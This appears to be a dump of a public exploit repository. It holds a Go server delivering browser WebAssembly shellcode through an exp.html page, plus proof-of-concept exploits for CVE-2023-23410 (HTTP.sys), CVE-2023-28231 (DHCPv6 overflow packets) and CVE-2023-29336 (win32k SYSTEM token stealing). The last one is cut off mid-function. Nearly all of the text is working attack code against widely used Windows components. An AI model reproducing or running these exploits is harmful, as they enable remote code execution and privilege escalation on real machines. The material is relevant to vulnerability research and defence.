    "content": "package main\n\nimport (\n\t\"errors\"\n\t\"flag\"\n\t\"fmt\"\n\t\"github.com/bytecodealliance/wasmtime-go/v8\"\n\t\"io/ioutil\"\n\t\"log\"\n\t\"math\"\n\t\"net/http\"\n\t\"os\"\n\t\"path\"\n\t\"path/filepath\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n)\n\nvar globalFloat float64 = -1\n\nvar wasm_code = `\n(module\n  (func $f (export \"f\") (param i64)\n  (call $f (i64.const 0x12EB9060B0C03148)) ;; 48 31 C0 B0 60 90 EB 12    12EB9060B0C03148\n  (call $f (i64.const 0x0BEB9090008B4865)) ;; 65 48 8B 00 90 90 EB 0B    0BEB9090008B4865\n  (call $f (i64.const 0x0BEB909018408B48)) ;; 48 8B 40 18 90 90 EB 0B    0BEB909018408B48\n  (call $f (i64.const 0x0BEB909030408B48)) ;; 48 8B 40 30 90 90 EB 0B    0BEB909030408B48\n  (call $f (i64.const 0x0BEBc08b48C08548)) ;; 48 85 C0 48 8b c0 EB 0B    0BEBc08b48C08548\n  (call $f (i64.const 0x0BEB000002D1840F)) ;; 0F 84 D1 02 00 00 EB 0B    0BEB000002D1840F\n  (call $f (i64.const 0x0BEB9000320033BA)) ;; BA 33 00 32 00 90 EB 0B    0BEB9000320033BA\n  (call $f (i64.const 0x0BEB909020E2C148)) ;; 48 C1 E2 20 90 90 EB 0B    0BEB909020E2C148\n  (call $f (i64.const 0x0BEB90004C0045B9)) ;; B9 45 00 4C 00 90 EB 0B    0BEB90004C0045B9\n  (call $f (i64.const 0x0BEBdb8b48CA0148)) ;; 48 01 CA 48 8b db EB 0B    0BEBdb8b48CA0148\n  (call $f (i64.const 0x0BEB004E0052B941)) ;; 41 B9 52 00 4E 00 EB 0B    0BEB004E0052B941\n  (call $f (i64.const 0x0BEB909020E1C149)) ;; 49 C1 E1 20 90 90 EB 0B    0BEB909020E1C149\n  (call $f (i64.const 0x0BEB900045004BB9)) ;; B9 4B 00 45 00 90 EB 0B    0BEB900045004BB9\n  (call $f (i64.const 0x0BEBc98b48C90149)) ;; 49 01 C9 48 8b c9 EB 0B    0BEBc98b48C90149\n  (call $f (i64.const 0x0BEB004C004CB841)) ;; 41 B8 4C 00 4C 00 EB 0B    0BEB004C004CB841\n  (call $f (i64.const 0x0BEB909020E0C149)) ;; 49 C1 E0 20 90 90 EB 0B    0BEB909020E0C149\n  (call $f (i64.const 0x0BEB900044002EB9)) ;; B9 2E 00 44 00 90 EB 0B    0BEB900044002EB9\n  (call $f (i64.const 0x0BEBf68b48C80149)) ;; 49 01 C8 48 8b f6 EB 0B    
0BEBf68b48C80149\n  (call $f (i64.const 0x0BEB909040488B48)) ;; 48 8B 48 40 90 90 EB 0B    0BEB909040488B48\n  (call $f (i64.const 0x0BEB904774C98548)) ;; 48 85 C9 74 47 90 EB 0B    0BEB904774C98548\n  (call $f (i64.const 0x0BEB90347509394C)) ;; 4C 39 09 75 34 90 EB 0B    0BEB90347509394C\n  (call $f (i64.const 0x0BEB207508513948)) ;; 48 39 51 08 75 20 EB 0B    0BEB207508513948\n  (call $f (i64.const 0x0BEB22741041394C)) ;; 4C 39 41 10 74 22 EB 0B    0BEB22741041394C\n  (call $f (i64.const 0x0BEBC08548008B48)) ;; 48 8B 00 48 85 C0 EB 0B    0BEBC08548008B48\n  (call $f (i64.const 0x0BEB10488B488C75)) ;; 75 8C 48 8B 48 10 EB 0B    0BEB10488B488C75\n  (call $f (i64.const 0x0BEB90903C416348)) ;; 48 63 41 3C 90 90 EB 0B    0BEB90903C416348\n  (call $f (i64.const 0x0BEBC80148C98949)) ;; 49 89 C9 48 01 C8 EB 0B    0BEBC80148C98949\n  (call $f (i64.const 0x0BEB000000880548)) ;; 48 05 88 00 00 00 EB 0B    0BEB000000880548\n  (call $f (i64.const 0x0BEB9090C031108B)) ;; 8B 10 31 C0 90 90 EB 0B    0BEB9090C031108B\n  (call $f (i64.const 0x0BEBff8b48CA0148)) ;; 48 01 CA 48 8b ff EB 0B    0BEBff8b48CA0148\n  (call $f (i64.const 0x0BEB909018528B44)) ;; 44 8B 52 18 90 90 EB 0B    0BEB909018528B44\n  (call $f (i64.const 0x0BEB909020428B44)) ;; 44 8B 42 20 90 90 EB 0B    0BEB909020428B44\n  (call $f (i64.const 0x0BEB9090245A8B44)) ;; 44 8B 5A 24 90 90 EB 0B    0BEB9090245A8B44\n  (call $f (i64.const 0x0BEB1c528bC80149)) ;; 49 01 C8 8b 52 1c EB 0B    0BEB1c528bC80149\n  (call $f (i64.const 0x0BEBCA0148CB0149)) ;; 49 01 CB 48 01 CA EB 0B    0BEBCA0148CB0149\n  (call $f (i64.const 0x0BEBc98b4dD28545)) ;; 45 85 D2 4d 8b c9 EB 0B    0BEBc98b4dD28545\n  (call $f (i64.const 0x0BEB00000092840F)) ;; 0F 84 92 00 00 00 EB 0B    0BEB00000092840F\n  (call $f (i64.const 0x0BEB90506C6175BB)) ;; BB 75 61 6C 50 90 EB 0B    0BEB90506C6175BB\n  (call $f (i64.const 0x0BEB909020E3C148)) ;; 48 C1 E3 20 90 90 EB 0B    0BEB909020E3C148\n  (call $f (i64.const 0x0BEB9074726956BE)) ;; BE 56 69 72 74 90 EB 0B  
  0BEB9074726956BE\n  (call $f (i64.const 0x0BEB088B41F30148)) ;; 48 01 F3 41 8B 08 EB 0B    0BEB088B41F30148\n  (call $f (i64.const 0x0BEB4674091C394A)) ;; 4A 39 1C 09 74 46 EB 0B    0BEB4674091C394A\n  (call $f (i64.const 0x0BEB04C08349C0FF)) ;; FF C0 49 83 C0 04 EB 0B    0BEB04C08349C0FF\n  (call $f (i64.const 0x0BEB90C572D03944)) ;; 44 39 D0 72 C5 90 EB 0B    0BEB90C572D03944\n  (call $f (i64.const 0x0BEBd28b4dC3C031)) ;; 31 C0 C3 4d 8b d2 EB 0B    0BEBd28b4dC3C031\n  (call $f (i64.const 0x0BEB904304B70F41)) ;; 41 0F B7 04 43 90 EB 0B    0BEB904304B70F41\n  (call $f (i64.const 0x0BEB9008245C8B48)) ;; 48 8B 5C 24 08 90 EB 0B    0BEB9008245C8B48\n  (call $f (i64.const 0x0BEBC8014C82048B)) ;; 8B 04 82 4C 01 C8 EB 0B    0BEBC8014C82048B\n\n  (call $f (i64.const 0x0BEB909090C68948)) ;; 48 89 C6 90 90 90 EB 0B    0BEB909090C68948\n  (call $f (i64.const 0x0BEB9000002000BA)) ;; BA 00 20 00 00 90 EB 0B    0BEB9000002000BA\n  (call $f (i64.const 0x0BEB00000040B841)) ;; 41 B8 40 00 00 00 EB 0B    0BEB00000040B841\n  (call $f (i64.const 0x0BEB90AABBCCDDB8)) ;; B8 DD CC BB AA 90 EB 0B    0BEB90AABBCCDDB8\n  (call $f (i64.const 0x0BEB909050F0014C)) ;; 4C 01 F0 50 50 90 EB 0B    0BEB909050F0014C\n  (call $f (i64.const 0x0BEB909090C18948)) ;; 48 89 C1 90 90 90 EB 0B    0BEB909090C18948\n  (call $f (i64.const 0x0BEB000019000548)) ;; 48 05 00 19 00 00 EB 0B    0BEB000019000548\n  (call $f (i64.const 0x0BEB90E6FFC18949)) ;; 49 89 C1 FF E6 90 EB 0B    0BEB90E6FFC18949\n)) \n`\n\nfunc faviconHandler(w http.ResponseWriter, r *http.Request) {\n\thttp.ServeFile(w, r, \"favicon.ico\")\n}\n\nfunc check(e error) {\n\tif e != nil {\n\t\tpanic(e)\n\t}\n}\nfunc isValidAddress(str string) bool {\n\tmatch, _ := regexp.MatchString(\"^[0-9a-fA-F]{1,8}$\", str)\n\treturn match\n}\n\nfunc processShellcodeAddr(str string, code string) (string, error) {\n\tif !isValidAddress(str) {\n\t\tfmt.Println(\"ShellcodeAddr地址无效\")\n\t\treturn \"\", errors.New(\"ShellcodeAddr地址无效\")\n\t}\n\tcode = 
strings.Replace(code, \"0x0BEB90AABBCCDDB8\", \"0x0BEB90\"+str+\"B8\", 1)\n\treturn code, nil\n}\nfunc fileServerHandler(w http.ResponseWriter, r *http.Request) {\n\tfmt.Println(r.URL.Path)\n\tp := \".\" + r.URL.Path\n\textName := path.Ext(r.URL.Path)\n\t// 获取路径的最后一部分\n\tbase := path.Base(r.URL.Path)\n\t// 检查它是否全部由0-9或a-f组成\n\tmatch, _ := regexp.MatchString(\"^[0-9a-f]+$\", base)\n\tif match {\n\t\tfmt.Println(\"Matched string:\", base)\n\t\t// 解析十六进制字符串为整数\n\t\ti, err := strconv.ParseInt(base, 16, 64)\n\t\tif err != nil {\n\t\t\tlog.Println(\"Error parsing hex string:\", err)\n\t\t\thttp.ServeFile(w, r, p)\n\t\t\treturn\n\t\t}\n\t\t// 获得i的高4个字节并减去0x10\n\t\thigh4Bytes := int64(uint64(i)>>32) - 0x10\n\n\t\t// 确保减法操作不会使值变为负数\n\t\tif high4Bytes < 0 {\n\t\t\thigh4Bytes = 0\n\t\t}\n\n\t\t// 用新值替换i的高4个字节\n\t\ti = (high4Bytes << 32) | (i & 0xFFFFFFFF)\n\t\t// 解析整数为浮点数\n\t\tglobalFloat = math.Float64frombits(uint64(i))\n\t\t// 打印浮点数\n\t\tfmt.Println(\"Float: \", globalFloat)\n\t\t// Send an empty response\n\t\tw.WriteHeader(http.StatusOK)\n\t\treturn\n\t}\n\tif base == \"exp.html\" {\n\t\tif globalFloat == -1 {\n\t\t\tfmt.Fprint(w, `\n\t\t\t<!DOCTYPE html>\n\t\t\t<html>\n\t\t\t<head>\n\t\t\t\t<title>Refresh Page</title>\n\t\t\t</head>\n\t\t\t<body>\n\t\t\t\t<script>setTimeout(function(){ location.reload(); }, 1000);</script>\n\t\t\t\t<p>Loading...</p>\n\t\t\t</body>\n\t\t\t</html>\n\t\t\t`)\n\t\t\treturn\n\t\t}\n\t\tcontent, err := ioutil.ReadFile(p)\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\t\tnewContent := strings.Replace(string(content), \"xxx\", fmt.Sprint(globalFloat), -1)\n\t\tfmt.Println(\"New content: \", newContent)\n\t\tfmt.Fprint(w, newContent)\n\t\tglobalFloat = -1\n\t\treturn\n\t}\n\t// fmt.Println(extName)\n\tif extName == \".wasm\" {\n\t\t// 去掉扩展名\n\t\tnameWithoutExt := strings.TrimSuffix(r.URL.Path, filepath.Ext(r.URL.Path))\n\t\t// 去掉前面的\"/\"\n\t\tbaseName := 
filepath.Base(nameWithoutExt)\n\t\tfmt.Printf(baseName)\n\t\twasmCodeOk, err := processShellcodeAddr(baseName, wasm_code)\n\t\tif err != nil {\n\t\t\tfmt.Println(\"发生错误：\", err)\n\t\t\tpanic(\"处理ShellcodeAddr发生错误\")\n\t\t}\n\t\tfmt.Println(wasmCodeOk)\n\t\twasm, err := wasmtime.Wat2Wasm(wasmCodeOk)\n\t\tif err != nil {\n\t\t\tfmt.Printf(\"error converting wat to wasm: %v\\n\", err)\n\t\t\tos.Exit(1)\n\t\t}\n\t\tfmt.Printf(\"编译结束\")\n\n\t\tw.Header().Set(\"Content-Type\", \"application/wasm\")\n\t\t_, err = w.Write([]byte(wasm))\n\t\tcheck(err)\n\t\tw.(http.Flusher).Flush()\n\t\tfmt.Printf(\"flushOK\")\n\t\treturn\n\t}\n\thttp.ServeFile(w, r, p)\n}\nfunc main() {\n\tport := flag.String(\"p\", \"443\", \"port to serve on\")\n\tdirectory := flag.String(\"d\", \".\", \"the directory of static file to host\")\n\tflag.Parse()\n\tfmt.Printf(\"path %s\\n\", *directory)\n\thttp.HandleFunc(\"/favicon.ico\", faviconHandler)\n\thttp.HandleFunc(\"/\", fileServerHandler)\n\tlog.Printf(\"Begin Serving %s on HTTP port: %s\\n\", *directory, *port)\n\tlog.Fatal(http.ListenAndServeTLS(\":443\", \"server.pem\", \"key.pem\", nil))\n}\n"
  },
  {
    "path": "CVE-2023-23410/CVE-2023-23410_poc.c",
    "content": "#define SECURITY_WIN32\r\n#include <http.h>\r\n#include <sspi.h>\r\n#include <strsafe.h>\r\n#pragma warning(disable:4127)   // condition expression is constant\r\n\r\nint\r\n__cdecl\r\nwmain(\r\n    int argc,\r\n    __in_ecount(argc) wchar_t* argv[]\r\n)\r\n{\r\n    \r\n    int i;\r\n    HANDLE          hReqQueue = NULL;\r\n    HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2;\r\n    HTTP_SERVER_SESSION_ID ssID = HTTP_NULL_ID;\r\n   \r\n    HTTP_BINDING_INFO BindingProperty;\r\n    HTTP_TIMEOUT_LIMIT_INFO CGTimeout;\r\n    ULONG           retCode;\r\n    HTTP_URL_GROUP_ID urlGroupId = HTTP_NULL_ID;\r\n\r\n\r\n    //\r\n    // Initialize HTTP APIs.\r\n    //\r\n\r\n    retCode = HttpInitialize(\r\n        HttpApiVersion,\r\n        HTTP_INITIALIZE_SERVER,    // Flags\r\n        NULL                       // Reserved\r\n    );\r\n\r\n    if (retCode != NO_ERROR)\r\n    {\r\n        wprintf(L\"HttpInitialize failed with %lu \\n\", retCode);\r\n        return retCode;\r\n    }\r\n\r\n    //\r\n    // Create a server session handle\r\n    //\r\n\r\n    retCode = HttpCreateServerSession(HttpApiVersion,\r\n        &ssID,\r\n        0);\r\n\r\n\r\n    if (retCode != NO_ERROR)\r\n    {\r\n        wprintf(L\"HttpCreateServerSession failed with %lu \\n\", retCode);\r\n        return;\r\n    }\r\n    //\r\n    // Create UrlGroup handle\r\n    //\r\n\r\n    retCode = HttpCreateUrlGroup(ssID,\r\n        &urlGroupId,\r\n        0);\r\n\r\n\r\n    if (retCode != NO_ERROR)\r\n    {\r\n        wprintf(L\"HttpCreateUrlGroup failed with %lu \\n\", retCode);\r\n        return;\r\n    }\r\n\r\n    ULONGLONG data1[4] = { 0 };\r\n    ULONGLONG data3[0x21] = { 0 };\r\n    ULONGLONG data[0x1000] = { 0 };\r\n    BYTE data_temp1[0x1000] = { 0 };\r\n    DWORD return_len = 0;\r\n\r\n    WCHAR* str = HeapAlloc(GetProcessHeap(), 0, 0xfffffe0);\r\n    WCHAR str_test[0xfffe] = L\"192.168.205.155:8081\";\r\n    memcpy(str, str_test, 0x20);\r\n    \r\n    data1[0] = 0x01;\r\n    
data1[1] = str;\r\n    data1[2] = 0xfffffe0-0xf0f0f0;\r\n    \r\n    for (int i = 0; i < 0x11; i++)\r\n    {\r\n        data3[i] = data1;\r\n    }\r\n    data[5] = 0x20;\r\n    data[3] = 0x0c;\r\n    data[2] = 0x11;\r\n    data[0] = 0x1;\r\n    data[1] = data3;\r\n\r\n    retCode = HttpSetUrlGroupProperty(urlGroupId, HttpServerChannelBindProperty,&data,0x20);\r\n\r\n    retCode = HttpQueryUrlGroupProperty(urlGroupId,HttpServerChannelBindProperty,&data_temp1,0x140, &return_len);\r\n\r\n\r\n}\r\n\r\n"
  },
  {
    "path": "CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp",
    "content": "﻿\r\n#include <winsock2.h>\r\n#include <ws2tcpip.h>\r\n#include <iostream>\r\n\r\n#pragma comment(lib, \"Ws2_32.lib\")\r\n\r\nint main() {\r\n    char data[] =\r\n        \"\\x0c\\x03\\xa4\\xf2\\x00\\x08\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\\x01\"\r\n        \"\\x00\\x01\\x2b\\x07\\x5b\\xc1\\x00\\x0c\\x29\\xe8\\x6b\\x79\\x00\\x03\\x00\\x0c\"\r\n        \"\\x07\\x00\"\r\n\r\n\r\n\r\n\r\n        \"\\x00\\x09\\x00\\x86\\x0c\\x02\"//0x3a+0x26*2\r\n\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n        \"\\x00\\x09\\x00\\x60\\x0c\\x02\"//0x3a+0x26\r\n\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n        \"\\x00\\x09\\x00\\x3a\\x0c\\x01\"\r\n\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n        \"\\x00\\x09\\x00\\x14\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x02\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x01\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n\r\n        ;\r\n\r\n    char par1[] =\r\n        \"\\x00\\x09\\x0a\\x9b\\x0c\\x01\"\r\n        \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n        \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n    char par2[] =\r\n        \"\\x00\\x09\\x00\\x14\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x02\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n        \"\\x00\\x01\\x00\\x04\\x01\\x07\\x00\\x00\"\r\n        ;\r\n\r\n\r\n\r\n    char data1[0x1000] =\r\n        \"\\x0c\\x20\\xa4\\xf2\\x00\\x08\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x0e\\x00\\x01\"\r\n        
\"\\x00\\x01\\x2b\\x07\\x5b\\xc1\\x00\\x0c\\x29\\xe8\\x6b\\x79\\x00\\x03\\x00\\x0c\"\r\n        \"\\x07\\x00\"\r\n\r\n        ;\r\n\r\n    int num = 0x1f;\r\n    int total_len = 0x14 + 0x26 * (num+1);\r\n    for (int i = 0; i <= num; i++)\r\n    {\r\n        memset(par1 + 5, num - i, 1);\r\n        short temp = htons(total_len - i * 0x26);\r\n\r\n        memcpy(par1 + 2, &temp, 2);\r\n        memcpy(data1 + 0x22 + 0x26 * i, par1, 0x26);\r\n        if (i == num)\r\n        {\r\n            memcpy(data1 + 0x22 + 0x26 * i + 0x26, par2, 0x18);\r\n        }\r\n\r\n    }\r\n    int sendlenth = 0x26 * (num+1) + 0x22 + 0x18;\r\n    // 初始化 Winsock\r\n    WSADATA wsaData;\r\n    int result = WSAStartup(MAKEWORD(2, 2), &wsaData);\r\n    if (result != 0) {\r\n        std::cerr << \"WSAStartup failed with error: \" << result << std::endl;\r\n        return 1;\r\n    }\r\n\r\n    // 创建套接字\r\n    SOCKET sock = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\r\n    if (sock == INVALID_SOCKET) {\r\n        std::cerr << \"Failed to create socket: \" << WSAGetLastError() << std::endl;\r\n        WSACleanup();\r\n        return 1;\r\n    }\r\n\r\n    // 设置套接字选项，允许发送广播\r\n    int optVal = 1;\r\n    if (setsockopt(sock, IPPROTO_IPV6, IPV6_MULTICAST_LOOP, (char*)&optVal, sizeof(optVal)) == SOCKET_ERROR) {\r\n        std::cerr << \"Failed to set socket option: \" << WSAGetLastError() << std::endl;\r\n        closesocket(sock);\r\n        WSACleanup();\r\n        return 1;\r\n    }\r\n\r\n    // 构建 DHCPv6 广播地址\r\n    sockaddr_in6 destAddr = { 0 };\r\n    destAddr.sin6_family = AF_INET6;\r\n    destAddr.sin6_port = htons(547); // DHCPv6 默认端口号为 547\r\n    InetPton(AF_INET6, L\"ff02::1:2\", &destAddr.sin6_addr); // DHCPv6 广播地址为 ff02::1:2\r\n\r\n    // 发送 DHCPv6 广播消息\r\n    int sendResult = 0;\r\n    for (int i = 0; i < 0x10; i++)\r\n    {\r\n        sendResult = sendto(sock, data1, sendlenth, 0, (sockaddr*)&destAddr, sizeof(destAddr));\r\n    }\r\n\r\n    int m = GetLastError();\r\n    if 
(sendResult == SOCKET_ERROR) {\r\n        std::cerr << \"Failed to send data: \" << WSAGetLastError() << std::endl;\r\n        closesocket(sock);\r\n        WSACleanup();\r\n        return 1;\r\n    }\r\n\r\n    std::cout << \"DHCPv6 Broadcast message sent!\" << std::endl;\r\n\r\n    // 清理资源\r\n    closesocket(sock);\r\n    WSACleanup();\r\n\r\n    return 0;\r\n}\r\n"
  },
  {
    "path": "CVE-2023-29336/poc.cpp",
    "content": "\n// writeup link:  https://www.numencyber.com/cve-2023-29336-win32k-analysis/\n\n#include <windows.h>\n//windows server 2016 Datacenter update patch in May\n#include <stdio.h>\n#include <tchar.h>\n\n#define IDM_MYMENU 101\n#define IDM_EXIT 102\n#define IDM_DISABLE 0xf120\n#define IDM_ENABLE 104\n#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440\n#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448\n#define EPROCESS_TOKEN_OFFSET 0x4b8\n\ntypedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT uIDEnableItem, UINT uEnable);\n\ntypedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, unsigned __int64 a3, unsigned int a4);\ntypedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);\ntypedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, int nConsoleInformationLength);\n\n\nNtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;\nNtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;\nNtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;\nfnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;\nLRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);\nint syytem();\ntypedef struct _SHELLCODE {\n    DWORD reserved;\n    DWORD pid;\n    DWORD off_THREADINFO_ppi;\n    DWORD off_EPROCESS_ActiveLink;\n    DWORD off_EPROCESS_Token;\n    BOOL  bExploited;\n    BYTE  pfnWindProc[];\n} SHELLCODE, * PSHELLCODE;\nstruct tagMENU\n{\n    ULONG64 field_0;\n    ULONG64 field_8;\n    ULONG64 field_10;\n    ULONG64 field_18;\n    ULONG64 field_20;\n    PVOID obj28;\n    DWORD field_30;\n    DWORD flag1;\n    DWORD flag2;\n    DWORD cxMenu;\n    DWORD cyMenu;\n    ULONG64 field_48;\n    PVOID rgItems;\n    ULONG64 field_58; // + 0x58\n    ULONG64 field_60;\n    ULONG64 field_68;\n    ULONG64 field_70;\n    ULONG64 field_78;\n    ULONG64 field_80;\n    ULONG64 field_88;\n    ULONG64 field_90;\n    PVOID ref; // + 0x98\n};\nstruct MyData\n{\n    BYTE name[0x96];\n};\ntagMENU* 
g_pFakeMenu = 0;\nstatic PSHELLCODE pvShellCode = NULL;\nHMENU hSystemMenu;\nHMENU hMenu;\nHMENU hSubMenu;\nHMENU hAddedSubMenu;\nHMENU hMenuB;\nPVOID MENU_add = 0;\nDWORD flag = 0;\nUINT iWindowCount = 0x100;\nHWND HWND_list[0x300];\nHWND HWND_list1[0x20];\nHMENU HMENUL_list[0x300];\nint Hwnd_num = 0;\nint Hwnd_num1 = 0;\nULONGLONG HWND_add = 0;\nULONGLONG GS_off = 0;\nWORD max = 0;\n\nstatic PULONGLONG     ptagWNDFake = NULL;\nstatic PULONGLONG     ptagWNDFake1 = NULL;\nstatic PULONGLONG     ptagWNDFake2 = NULL;\n\nstatic PULONGLONG     GS_hanlde = NULL;\n\nstatic PULONGLONG     HWND_class = NULL;\n\n\nstruct ThreadParams {\n    int threadId;\n    int numLoops;\n};\n\n\nstatic unsigned long long GetGsValue(unsigned long long gsValue)\n{\n    return gsValue;\n}\nPVOID\nGetMenuHandle(HMENU menu_D)\n{\n    int conut = 0;\n    PVOID HANDLE = 0;\n    PBYTE add = 0;\n    WORD temp = 0;\n    DWORD offset = 0xbd688;\n    HMODULE hModule = LoadLibraryA(\"USER32.DLL\");\n\n    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, \"IsMenu\");\n    ULONGLONG par1 = 0;\n    DWORD par2 = 0;\n    memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);\n    memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);\n\n    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);\n\n    if (add)\n    {\n        HANDLE = *(PVOID*)add;\n    }\n    else\n    {\n        HANDLE = 0;\n    }\n    HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20);\n    return *(PVOID*)HANDLE;\n\n}\n\nPVOID\nxxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)\n{\n    int conut = 0;\n    PVOID HANDLE = 0;\n    PBYTE add = 0;\n    WORD temp = 0;\n    DWORD offset = 0xbd688;\n    HMODULE hModule = LoadLibraryA(\"USER32.DLL\");\n\n    PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, \"IsMenu\");\n    ULONGLONG par1 = 0;\n    DWORD par2 = 0;\n    memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);\n    memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);\n\n    temp = 
(ULONGLONG)menu_D >> 16;\n    add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);\n    if (add)\n    {\n        HANDLE = *(PVOID*)add;\n    }\n    else\n    {\n        HANDLE = 0;\n    }\n    HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20);\n    return *(PVOID*)HANDLE;\n\n}\n\n\nstatic\nVOID\nxxReallocPopupMenu(VOID)\n{\n    for (INT i = 0; i < 0x8; i++)\n    {\n        WNDCLASSEXW Class = { 0 };\n        WCHAR       szTemp[0x100] = { 0 };\n        HWND        hwnd = NULL;\n        wsprintfW(szTemp, L\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d\", i);\n        Class.cbSize = sizeof(WNDCLASSEXA);\n        Class.lpfnWndProc = DefWindowProcW;\n        Class.cbWndExtra = 0;\n        Class.hInstance = GetModuleHandleA(NULL);\n        Class.lpszMenuName = NULL;\n        Class.lpszClassName = szTemp;\n        if (!RegisterClassExW(&Class))\n        {\n            continue;\n        }\n    }\n\n}\nVOID\ncreateclass(VOID)\n{\n    WCHAR   szTemp[0x100] = { 0 };\n    for (INT i = 9; i < 29; i++)\n    {\n        WNDCLASSEXW Class = { 0 };\n        \n        HWND        hwnd = NULL;\n        wsprintfW(szTemp, L\"A@A%d\", i);\n        Class.cbSize = sizeof(WNDCLASSEXA);\n        Class.lpfnWndProc = DefWindowProcW;\n        Class.cbWndExtra = 0x20;\n        Class.hInstance = GetModuleHandleA(NULL);\n        Class.lpszMenuName = NULL;\n        Class.lpszClassName = szTemp;\n        Class.cbClsExtra = 0x1a0;\n        if (!RegisterClassExW(&Class))\n        {\n            continue;\n        }\n    }\n\n    for (INT i = 9; i < 29; i++)\n    {\n        wsprintfW(szTemp, L\"A@A%d\", i);\n        HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, 0, 0, NULL,NULL, NULL, NULL);\n        \n        \n    }\n    \n}\n\nULONG64 Read64(ULONG64 address)\n{\n    MENUBARINFO mbi = { 0 };\n    mbi.cbSize = sizeof(MENUBARINFO);\n\n    g_pFakeMenu->rgItems = PVOID(address - 0x48);\n    GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi);\n\n    return 
(unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);\n}\nvoid exploit()\n{\n    for (int i = 0; i < 0x20; i++)\n    {\n        \n        ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, (LONG_PTR)g_pFakeMenu);\n        if (pmenu != 0)\n        {\n            Hwnd_num = i;\n            MENUBARINFO mbi = { 0 };\n            mbi.cbSize = sizeof(MENUBARINFO);\n\n\n\n        }\n    }\n\n\n    // Token stealing\n    ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO \n    p = Read64(p);            //THREADINFO\n    p = Read64(p + 0x220);         // (PROCESSINFO)         \n\n    ULONG64 eprocess = p;\n    printf(\"Current EPROCESS = %llx\\n\", eprocess);\n    p = Read64(p + 0x2f0);\n\n    do {\n\n        p = Read64(p + 0x08);\n        ULONG64 pid = Read64(p - 0x08);\n        if (pid == 4) {\n\n            ULONG64 pSystemToken = Read64(p + 0x68);\n            printf(\"pSys/tem Token = %llx \\n\", pSystemToken);\n\n            HWND_class = (PULONGLONG)((PBYTE)0x303000);\n            HWND_class[8] = eprocess + 0x290;\n            HWND_class[12] = 0x100;\n            HWND_class[20] = 0x303010;\n\n            ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)HWND_class);\n            SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);\n            ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)ret_add);\n\n            break;\n        }\n    } while (p != eprocess);\n    syytem();\n}\n\n\nvoid buildmem()\n{\n    \n    WORD max_handle = 0;\n    pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n    if (pvShellCode == NULL)\n    {\n        return;\n   